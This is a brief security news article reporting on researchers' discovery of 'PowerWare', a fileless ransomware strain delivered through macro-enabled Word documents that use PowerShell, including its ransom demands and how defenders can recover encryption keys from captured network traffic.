Cybercriminals Are Using Microsoft PowerShell to Create Ransomware

Cybercriminals are now targeting healthcare firms, enterprises and even hospitals to launch attacks with a strain of ransomware created using Microsoft’s PowerShell scripting language used for system administration.

Security researchers from security firm Carbon Black have discovered a strain of ransomware that targeted a healthcare organization using Microsoft’s PowerShell scripting language. The ransomware malware was unsuccessful in its email phishing campaign.

Dubbed ‘PowerWare’ by the security researchers, it is a newly discovered strain of ransomware malware that targets its victims with a macro-enabled Microsoft Word document.

The means to using PowerShell to obtain and then execute the malicious code meant that the ransomware could avoid writing new files to disk. Instead, the ransomware was written to blend in with legitimate activity in an operating system, making it harder to detect.

As an ever-increasing menace, normal ransomware variants usually install malicious files onto the systems which can now be easier to detect, as opposed to the new strain of PowerWare ransomware.

While the code is routinely simple, security researchers discovered that PowerWare takes a unique and yet novel approach to ransomware.

The researchers discovered that PowerWare was delivered through a Microsoft Word document that was macro-enabled to then launch two instances of PowerShell.

In what attests to the theory that malware authors are thinking out of the box to make their products harder to detect and kill, one of the two instances downloads the ransomware script on its own. The other uses this script as input to then run the malicious code in order to encrypt files on the targeted system.  The strain then behaves like any other form of ransomware, by demanding a ransom payment in return for a decryption key to release the files.

In this case, PowerWare initially demands a ransom of $500. If it goes unpaid after two weeks, the ransom demand increases to $1000.

Researchers from Carbon Black also revealed that organizations that have the security infrastructure in place for a full packet capture would be able to recover the encryption keys.

They also discovered that a strain of PowerWare ransomware, when discovered, calls upon its command and control servers over a plain-text protocol, leaving the traffic to be easily observed.

Organizations would then simply have to identify the correct domain and IP range from the network traffic to retrieve the encryption key, making the recovery process simpler.

Image credit: imgur